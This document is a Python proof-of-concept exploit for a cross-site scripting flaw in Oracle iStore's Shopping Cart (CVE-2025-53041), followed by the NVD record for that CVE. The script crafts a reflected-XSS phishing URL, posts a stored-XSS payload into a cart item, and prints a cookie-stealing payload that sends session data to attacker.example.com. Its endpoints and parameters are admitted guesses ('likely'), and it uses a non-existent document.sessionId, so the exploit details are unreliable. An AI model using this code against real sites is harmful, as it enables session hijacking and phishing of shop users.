CVE-2025-53041

# CVE-2025-53041 - Oracle iStore Shopping Cart XSS PoC # Vulnerability: Reflected/Stored XSS in Oracle iStore Shopping Cart component # Affected versions: 12.2.5 - 12.2.14 # Attack vector: Network (HTTP), No authentication required, User interaction required import requests import urllib.parse TARGET_URL = "https://target-oracle-ebs.example.com/OA_HTML/ibeCAcpSSORView" # Malicious payload - typical XSS payload for Oracle iStore Shopping Cart # The injection point is likely in a shopping cart parameter (e.g., item description, search query) payload = '<script>alert("XSS-CVE-2025-53041");</script>' def exploit_reflected_xss(): """ Exploit reflected XSS in Oracle iStore Shopping Cart component. The attacker crafts a malicious URL containing the XSS payload and tricks the victim into clicking it. """ # Encode the payload for URL inclusion encoded_payload = urllib.parse.quote(payload) # Construct malicious URL with XSS payload in shopping cart parameter malicious_url = f"{TARGET_URL}?itemDesc={encoded_payload}&action=addToCart" print(f"[*] Crafted malicious URL: {malicious_url}") print(f"[*] Send this URL to the victim via phishing email or social engineering") print(f"[*] When victim clicks, script executes in their browser context") return malicious_url def exploit_stored_xss(session, payload): """ Exploit stored XSS by injecting payload into shopping cart item. The payload gets stored and executed when other users view the cart. """ # Step 1: Add malicious item to shopping cart add_to_cart_data = { "itemNumber": "TEST_ITEM", "itemDescription": payload, # Inject XSS via item description "quantity": "1", "action": "add" } response = session.post( f"{TARGET_URL}/ibeCAcpAddItem", data=add_to_cart_data, headers={"Content-Type": "application/x-www-form-urlencoded"} ) print(f"[*] Payload stored in shopping cart") print(f"[*] Status: {response.status_code}") # Step 2: When victim views the shopping cart, the payload executes return response # Example usage if __name__ == "__main__": # Method 1: Reflected XSS via crafted URL url = exploit_reflected_xss() # Method 2: Stored XSS via shopping cart manipulation # session = requests.Session() # exploit_stored_xss(session, payload) # Advanced payload for session hijacking advanced_payload = ''' <script> var img = new Image(); img.src = "https://attacker.example.com/steal?cookie=" + document.cookie + "&session=" + document.sessionId + "&url=" + document.location.href; </script> ''' print(f"\n[*] Advanced payload for data exfiltration:") print(advanced_payload)

{"cve": {"id": "CVE-2025-53041", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:41.273", "lastModified": "2025-10-23T16:07:45.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.2.5-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:istore:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.5", "versionEndIncluding": "12.2.14", "matchCriteriaId": "DD8AED6C-F6D0-4721-B75B-E8836012CAB8"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}